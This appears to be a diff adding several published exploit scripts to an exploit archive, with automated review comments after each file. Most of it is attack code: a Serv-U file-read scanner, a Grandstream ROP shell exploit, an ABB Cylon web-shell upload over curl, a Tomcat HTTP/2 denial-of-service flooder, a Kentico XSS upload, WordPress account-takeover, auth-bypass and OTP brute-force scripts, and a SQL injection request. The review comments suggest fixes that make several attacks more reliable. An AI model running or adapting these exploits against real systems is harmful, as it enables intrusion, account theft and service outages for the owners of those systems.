print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-f", "--file", help="File containing a list of URLs to scan")
parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)")
parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)")
parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try")
parser.add_argument("-o", "--output", help="Output JSON file to save results")
args = parser.parse_args()
print_banner()
# Validate arguments
if not args.url and not args.file:
parser.print_help()
print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}")
sys.exit(1)
targets = []
# Get targets
if args.url:
targets.append(args.url)
if args.file:
try:
with open(args.file, "r") as f:
targets.extend([line.strip() for line in f.readlines() if line.strip()])
except Exception as e:
print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}")
sys.exit(1)
# Deduplicate targets
targets = list(set(targets))
if not targets:
print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}")
sys.exit(1)
print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}")
# Set output file
output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json"
# Start scanning
results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist)
# Process results
vulnerable_count = sum(1 for result in results if result.is_vulnerable)
print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}")
print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}")
print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}")
# Save results
save_results(results, output_file)
# Save vulnerable file contents
for result in results:
if result.is_vulnerable and result.file_content:
save_vulnerable_content(result, "vulnerable_files")
print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
sys.exit(0)
except Exception as e:
print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}")
sys.exit(1)
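Review bot: `is_vulnerable_version` reports every 15.4.2 build as vulnerable at `if patch <= 2:`, yet its docstring scopes the check to "15.4.2 HF1 or lower" and the `Serv-U/(\d+\.\d+\.\d+)` pattern in `extract_server_version` never captures a hotfix level, so a host on the fixed 15.4.2 HF2 is indistinguishable from HF1 here; either return `None` (unknown) for 15.4.2 or state in the docstring that the version gate cannot see hotfixes and is informational only, which is how `scan_target` already treats it. The bare `except:` two lines below also swallows `KeyboardInterrupt`; `except ValueError:` is what `map(int, version.split('.'))` and the three-way unpack actually raise. `detect_os_type` marks any 200 response longer than 100 characters that merely contains `Windows`, `/home/` or `[fonts]` as a confirmed read, so an ordinary login page mentioning Windows would be printed as `VULNERABLE`; the output should at least label this as a heuristic match rather than a verified read. Separately, `save_vulnerable_content` opens its output with `open(output_path, 'w')` and writes decoded remote text, which raises `UnicodeEncodeError` under a non-UTF-8 locale and is then reported as a save error; `open(output_path, 'w', encoding='utf-8', errors='replace')` avoids that, and `os.makedirs(output_dir, exist_ok=True)` replaces the exists-then-create pair.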

110
exploits/multiple/remote/52313.py Executable file

@ -0,0 +1,110 @@
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-i', '--ip', type=str, required=True,
help='device IP address', dest="ip")
parser.add_argument('-u', '--user', type=str, required=True,
help='username', dest="user")
parser.add_argument('-p', '--pass', type=str, required=True,
help='password', dest="pwd")
# Array for all arguments passed to script
args = parser.parse_args()
try:
ip = args.ip
user = args.user
pwd = args.pwd
return ip, user, pwd
except ValueError:
exit()
def check_badchars(payload):
for i in range(5, len(payload)):
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
return True
return False
def main():
ip, user, pwd = get_args()
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
if check_badchars(payload):
sys.exit(0)
count = 1
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
sleep(1)
data = p.read()
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
s.close()
count += 1
if __name__ == '__main__':
main()
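Review bot: The `while True:` loop in `main` has no upper bound, so when the marker never appears in `data` the script opens a fresh SSH session on every iteration indefinitely and only Ctrl-C ends it; a `max_tries` limit (e.g. `for count in range(1, max_tries + 1):` with a non-zero `sys.exit` after the loop) makes the retry behaviour explicit and keeps the attempt count visible in logs. `if str(data).find('root') > -1:` stringifies the bytes object and searches its `b'...'` repr; `if b'root' in data:` is the direct check. The local `exit = libc_base + 0x2660C` shadows the builtin `exit` inside `main` — harmless today because `main` calls `sys.exit`, while `get_args` relies on the builtin — and a name such as `exit_addr` would remove the ambiguity. The header `# Exploit Title: Grandstream GSD3710 ...` does not match the `GDS3710> ` prompt the code waits on; the model looks to be GDS3710, worth confirming and correcting the title.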


@ -0,0 +1,97 @@
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.04
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeploymentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5954
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
> ?RequestType=DeploySource\
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
> &directory=/" \
> --data-binary @zsl.php \
> -H "Host: 127.0.0.1" \
> -H "Content-Type: application/octet-stream"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php

143
exploits/multiple/remote/52318.py Executable file

@ -0,0 +1,143 @@
# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS)
# Author: Abdualhadi khalifa
# CVE: CVE-2025-31650
import httpx
import asyncio
import random
import urllib.parse
import sys
import socket
from colorama import init, Fore, Style
init()
class TomcatKiller:
def __init__(self):
self.success_count = 0
self.error_count = 0
self.invalid_priorities = [
\\\"u=-1, q=2\\\",
\\\"u=4294967295, q=-1\\\",
\\\"u=-2147483648, q=1.5\\\",
\\\"u=0, q=invalid\\\",
\\\"u=1/0, q=NaN\\\",
\\\"u=1, q=2, invalid=param\\\",
\\\"\\\",
\\\"u=1, q=1, u=2\\\",
\\\"u=99999999999999999999, q=0\\\",
\\\"u=-99999999999999999999, q=0\\\",
\\\"u=, q=\\\",
\\\"u=1, q=1, malformed\\\",
\\\"u=1, q=, invalid\\\",
\\\"u=-1, q=4294967295\\\",
\\\"u=invalid, q=1\\\",
\\\"u=1, q=1, extra=\\\",
\\\"u=1, q=1; malformed\\\",
\\\"u=1, q=1, =invalid\\\",
\\\"u=0, q=0, stream=invalid\\\",
\\\"u=1, q=1, priority=recursive\\\",
\\\"u=1, q=1, %invalid%\\\",
\\\"u=0, q=0, null=0\\\",
]
async def validate_url(self, url):
try:
parsed_url = urllib.parse.urlparse(url)
if not parsed_url.scheme or not parsed_url.hostname:
raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\")
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80)
return host, port
except Exception:
print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\")
sys.exit(1)
async def check_http2_support(self, host, port):
async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:
try:
response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"})
if response.http_version == \\\"HTTP/2\\\":
print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\")
return True
else:
print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\")
return False
except Exception:
print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\")
return False
async def send_invalid_priority_request(self, host, port, num_requests, task_id):
async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:
url = f\\\"https://{host}:{port}/\\\"
for i in range(num_requests):
headers = {
\\\"priority\\\": random.choice(self.invalid_priorities),
\\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\",
\\\"cache-control\\\": \\\"no-cache\\\",
\\\"accept\\\": f\\\"*/*; q={random.random()}\\\",
}
try:
await client.get(url, headers=headers)
self.success_count += 1
except Exception:
self.error_count += 1
async def monitor_server(self, host, port):
while True:
try:
with socket.create_connection((host, port), timeout=2):
print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\")
except Exception:
print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\")
break
await asyncio.sleep(2)
async def run_attack(self, host, port, num_tasks, requests_per_task):
print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\")
print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\")
print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\")
monitor_task = asyncio.create_task(self.monitor_server(host, port))
tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]
await asyncio.gather(*tasks)
monitor_task.cancel()
total_requests = num_tasks * requests_per_task
success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0
print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\")
print(f\\\"Target: {host}:{port}\\\")
print(f\\\"Total Requests: {total_requests}\\\")
print(f\\\"Successful Requests: {self.success_count}\\\")
print(f\\\"Failed Requests: {self.error_count}\\\")
print(f\\\"Success Rate: {success_rate:.2f}%\\\")
print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\")
async def main():
print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\")
print(f\\\"Developed by: @absholi7ly\\\")
print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\")
print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\")
url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\")
num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300)
requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000)
tk = TomcatKiller()
host, port = await tk.validate_url(url)
if not await tk.check_http2_support(host, port):
sys.exit(1)
await tk.run_attack(host, port, num_tasks, requests_per_task)
if __name__ == \\\"__main__\\\":
try:
asyncio.run(main())
print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\")
except KeyboardInterrupt:
print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\")
sys.exit(0)
except Exception as e:
print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\")
sys.exit(1)
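Review bot: `check_http2_support` and `send_invalid_priority_request` hard-code `https://{host}:{port}/` even though `validate_url` explicitly accepts `http://` targets and defaults their port to 80, so an `http://host:8080` argument gets a TLS handshake against a plaintext port and is misreported as "HTTP/2 not supported" or "Could not connect". Carry the scheme through (`return parsed_url.scheme, host, port` and `url = f"{scheme}://{host}:{port}/"`), or reject `http://` up front instead of silently upgrading it. `monitor_server` also declares the target "unreachable or crashed!" on the first failed `socket.create_connection`, but with 300 tasks each allowed 1000 connections a refused connect is just as likely to be backlog or ephemeral-port exhaustion on either end, so that message should not be taken as confirmation of CVE-2025-31650 — the `OutOfMemoryError` in catalina.out mentioned in `run_attack` is the real signal. The `verify=False` on every client disables certificate checking entirely; acceptable for a lab target but worth a one-line comment saying so.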


@ -0,0 +1,68 @@
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse
def create_svg_payload(svg_filename: str):
print(f"[*] Writing malicious SVG to: {svg_filename}")
svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
with open(svg_filename, 'w') as f:
f.write(svg_payload)
def zip_payload(svg_filename: str, zip_filename: str):
print(f"[*] Creating zip archive: {zip_filename}")
subprocess.run(['zip', zip_filename, svg_filename], check=True)
def upload_zip(zip_filename: str, target_url: str):
full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
headers = {
"Content-Type": "application/octet-stream"
}
print(f"[+] Uploading {zip_filename} to {full_url}")
with open(zip_filename, 'rb') as f:
response = requests.post(full_url, headers=headers, data=f,
verify=False)
if response.status_code == 200:
print("[+] Upload succeeded")
else:
print(f"[-] Upload failed with status code {response.status_code}")
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")
args = parser.parse_args()
create_svg_payload(args.svg)
zip_payload(args.svg, args.zip)
upload_zip(args.zip, args.url)
```
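Review bot: The `--svg` default is `poc.svc`, not `poc.svg`; the payload is written and zipped under that name, and a `.svc` entry is unlikely to be served back as `image/svg+xml`, so the default invocation will not reproduce the XSS even on a vulnerable build — change it to `default="poc.svg"`. The argparse description names CVE-2025-2748 while the header says CVE-2025-32370; one of them is wrong and the help text is what a user sees. `zip_payload` shells out to an external `zip` binary, which the stdlib replaces portably: `with zipfile.ZipFile(zip_filename, 'w') as zf: zf.write(svg_filename)`. The zip name is also interpolated into the query string unencoded (`?Filename={zip_filename}`), so a name containing `&` or spaces breaks the request; pass it through `urllib.parse.quote`.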


@ -0,0 +1,71 @@
# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
import requests
import argparse
import sys
def display_banner():
banner = """
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
print(banner)
def suppress_ssl_warnings():
requests.packages.urllib3.disable_warnings()
def initialize_session():
new_session = requests.Session()
new_session.verify = False
new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
return new_session
def parse_input_args():
parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
return parser.parse_args()
def generate_payload(user, email):
return {
'action': 'flrblocksusersettingsupdatehandle',
'user_id': user,
'flr-blocks-email-update': email
}
def execute_exploit(session, target_url, payload):
try:
return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
except Exception as error:
print(f"Request error: {error}")
sys.exit(1)
def process_response(response):
if response.status_code == 200 and response.text.strip() != "0":
print(f"Exploit succeeded! Response: {response.text}")
print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
else:
print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
def run_exploit():
display_banner()
suppress_ssl_warnings()
args = parse_input_args()
session = initialize_session()
payload = generate_payload(args.target_user, args.new_email)
response = execute_exploit(session, args.target, payload)
process_response(response)
if __name__ == "__main__":
run_exploit()
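Review bot: The `--new_email` default is `example@gmail.com`, a real mailbox on a third-party domain; if the request succeeds the admin's password-reset link goes to whoever controls that address, so the default should be dropped (`required=True`) or replaced with a clearly tester-owned placeholder. `process_response` reports "Exploit succeeded!" for any HTTP 200 whose body is not literally `"0"`, yet admin-ajax handlers commonly return an error JSON such as `{"success":false,...}` with status 200, so a rejected request is printed as a success — look for a positive marker in the body rather than only excluding `"0"`. `session.post` has no `timeout`, so a stalled target hangs the script indefinitely. Because the URL is built as `f"{target_url}/wp-admin/admin-ajax.php"`, a trailing slash on `--target` produces `//wp-admin`; `rstrip('/')` the argument first.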


@ -0,0 +1,65 @@
#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594
import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored
def banner():
cprint("┌──────────────────────────────────────────────┐", "cyan")
cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan")
cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
cprint("│ Author: Mohammed Idrees Banyamer │", "cyan")
cprint("└──────────────────────────────────────────────┘", "cyan")
def exploit(target_url, member_id, nonce):
endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
files = {
'action': (None, 'user_registration_membership_confirm_payment'),
'security': (None, nonce),
'form_response': (None, '{"auto_login": true}'),
'member_id': (None, str(member_id))
}
cprint(f"[+] Target URL: {endpoint}", "yellow")
cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
try:
response = requests.post(endpoint, files=files, timeout=10)
if response.status_code == 200 and '"success":true' in response.text:
cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
print("Server Response:")
print(response.text)
else:
cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
print("Server Response:")
print(response.text)
except requests.exceptions.RequestException as e:
cprint(f"[!] Request failed: {e}", "red")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
args = parser.parse_args()
exploit(args.target, args.member_id, args.nonce)
if __name__ == "__main__":
main()
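Review bot: The success message tells the user to "Check your session/cookies", but the request is a bare `requests.post`, so any auto-login cookies the plugin sets in the response are discarded and never shown. Use a `requests.Session()` and print `response.cookies` (or `response.headers.get('Set-Cookie')`) on success, since that cookie is the actual outcome of the bypass. `urljoin(target_url, "/wp-admin/admin-ajax.php")` discards any path in the base URL, so a site at `http://host/blog` is sent to `http://host/wp-admin/...`; build it as `target_url.rstrip('/') + '/wp-admin/admin-ajax.php'` instead. The script also never checks `response.status_code` before printing on the failure path, which is fine, but `verify` is left at its default so self-signed lab targets will fail the handshake — worth a `--insecure` flag or a note.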


@ -0,0 +1,74 @@
# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Google Dork: inurl:/wp-content/plugins/digits/
# Date: 2025-04-30
# Exploit Author: Saleh Tarawneh
# Vendor Homepage: https://digits.unitedover.com/
# Version: < 8.4.6.1
# CVE : CVE-2025-4094
"""
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
CWE-287: Improper Authentication
CVSS v3.1: 9.8 (Critical)
OWASP A2: Broken Authentication
[Instructions]
1. Use a tool like Burp Suite or your browsers developer tools to intercept the OTP verification request.
2. Copy the exact request parameters
3. Replace the placeholder values in the script with real data from the intercepted request.
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
[Alternative Method Burp Suite Pro]
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
1. Intercept the OTP request using Burp Proxy.
2. Send the request to Intruder.
3. Mark the `sms_otp` parameter as the payload position.
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
5. Start the attack and monitor responses for a different status code, length, or success message.
"""
import requests
def brute(otp):
url = "https://example.com/wp-admin/admin-ajax.php"
data = { # Replace with targets data
"login_digt_countrycode": "+",
"digits_phone": "000000000",
"action_type": "phone",
"sms_otp": otp,
"otp_step_1": "1",
"instance_id": "xxxxxxx",
"action": "digits_forms_ajax",
"type": "forgot",
"forgot_pass_method": "sms_otp",
"digits": "1",
"digits_redirect_page": "//example.com/",
"digits_form": "xxxxxxxx",
"_wp_http_referer": "/?login=true"
}
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://example.com/?login=true" # Replace with intercepted referer
}
response = requests.post(url, data=data, headers=headers)
if '"success":true' in response.text:
print(f"[+] OTP FOUND: {otp}")
exit()
def main():
for otp in range(0, 10000): # range(0, 1000000): for 6-digit
otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
print(f"[*] Trying OTP: {otp_str}")
brute(otp_str)
if __name__ == "__main__":
main()
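Review bot: `requests.post` in `brute` has no `timeout`, so a target that throttles by stalling the connection — a common response to exactly this kind of flood — hangs the loop forever instead of surfacing the problem; add `timeout=10` and reuse a single `requests.Session()` across the loop so the 10,000 (or 1,000,000) requests share a connection. The script only matches `"success":true` and never looks for a lockout, OTP-expired or rate-limit response, so once the server blocks the attempt it keeps iterating the remaining codes with no indication; at minimum print any non-success body that differs from the first response. `exit()` is the `site`-module convenience and is absent under `python -S`; use `sys.exit(0)` with an `import sys`. The docstring says the same flow applies to registration, but the payload fields (`type`, `forgot_pass_method`) are specific to the forgot-password path, so that claim is untested as written.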


@ -0,0 +1,72 @@
# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: Carine Constantino
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Linux - Ubuntu Ubuntu 23.10
# CVE: CVE-2025-5298
# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
# The report in admin/betweendates-detailsreports.php does not validate fromdate and todate fields
# And allows the processing of SQL Injection queries of the types:
# blind time-based in the fromdate field
# boolean-based in the todate field
# Union Query in the todate field
fromdate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
